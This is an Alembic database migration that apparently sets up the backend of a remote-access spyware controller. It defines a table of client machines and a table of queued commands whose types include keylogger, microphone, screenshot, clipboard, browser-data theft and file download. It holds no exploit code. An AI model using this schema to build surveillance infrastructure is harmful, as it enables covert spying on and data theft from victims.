"""Initial migration.

Revision ID: fdbbb0feb591
Revises: 
Create Date: 2024-06-03 10:58:01.546754

"""
import sqlalchemy as sa
from alembic import op

# revision identifiers, used by Alembic.
revision = 'fdbbb0feb591'
down_revision = None
branch_labels = None
depends_on = None


def upgrade():
    # ### commands auto generated by Alembic - please adjust! ###
    op.create_table('client',
                    sa.Column('id', sa.Integer(), nullable=False),
                    sa.Column('ip', sa.String(length=15), nullable=False),
                    sa.Column('os', sa.String(length=50), nullable=True),
                    sa.Column('os_version', sa.String(length=50), nullable=True),
                    sa.Column('hostname', sa.String(length=50), nullable=True),
                    sa.Column('status', sa.String(length=10), nullable=False),
                    sa.Column('sid', sa.String(length=128), nullable=True),
                    sa.Column('date_created', sa.DateTime(), nullable=True),
                    sa.Column('date_updated', sa.DateTime(), nullable=True),
                    sa.PrimaryKeyConstraint('id'),
                    sa.UniqueConstraint('ip')
                    )
    op.create_table('command',
                    sa.Column('id', sa.Integer(), nullable=False),
                    sa.Column('type', sa.Enum('SCREENSHOT', 'MICROPHONE', 'BROWSER_DATA', 'KEYLOGGER', 'CLIPBOARD',
                                              'DOWNLOAD_FILE', 'DIRECTORY_LISTING', name='commandtype'),
                              nullable=False),
                    sa.Column('browser_name', sa.String(length=64), nullable=True),
                    sa.Column('user_id', sa.String(length=64), nullable=True),
                    sa.Column('client_id', sa.Integer(), nullable=False),
                    sa.Column('file_path', sa.String(length=256), nullable=True),
                    sa.Column('dir_path', sa.String(length=256), nullable=True),
                    sa.Column('date_created', sa.DateTime(), nullable=False),
                    sa.Column('date_updated', sa.DateTime(), nullable=False),
                    sa.ForeignKeyConstraint(['client_id'], ['client.id'], ),
                    sa.PrimaryKeyConstraint('id')
                    )
    # ### end Alembic commands ###


def downgrade():
    # ### commands auto generated by Alembic - please adjust! ###
    op.drop_table('command')
    op.drop_table('client')
    # ### end Alembic commands ###
